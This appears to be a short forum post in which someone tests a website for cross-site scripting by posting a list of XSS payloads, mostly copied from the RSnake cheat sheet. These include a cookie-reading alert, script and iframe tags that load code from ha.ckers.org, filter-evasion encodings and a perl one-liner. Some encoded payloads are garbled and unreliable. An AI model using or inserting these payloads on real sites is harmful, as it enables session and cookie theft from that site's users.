Hmm, lemme test for some more XSS vulnerabilities, other than the one Mike found. If they work, a popup should come up.
<img src='john.jpg' onerror='alert(document.cookie)'>
Here's one I found online
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Another one from the same site
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<IMG SRC=javascript
:alert("XSS"
>
Yet again
<IMG SRC=`javascript
:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript
:alert(String.fromCharCode(88,8*,8*))>
Different encodings: should output alert(xss) or whatever
<IMG SRC=javascript
:alert('XSS')>
<IMG SRC=�*06�*7�**8�*7�**5�**�**4�*05�**2�**6� 058�*7�*08�*0*�**4�**6(�**X**� ***>
<IMG SRC=j*v***r*pt&#x*A*lert('X& #x5**'*>
<IMG SRC="jav ascript:alert('XSS');">
Using perl thingy (all from the site)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<iframe src=http://ha.ckers.org/scriptlet.html>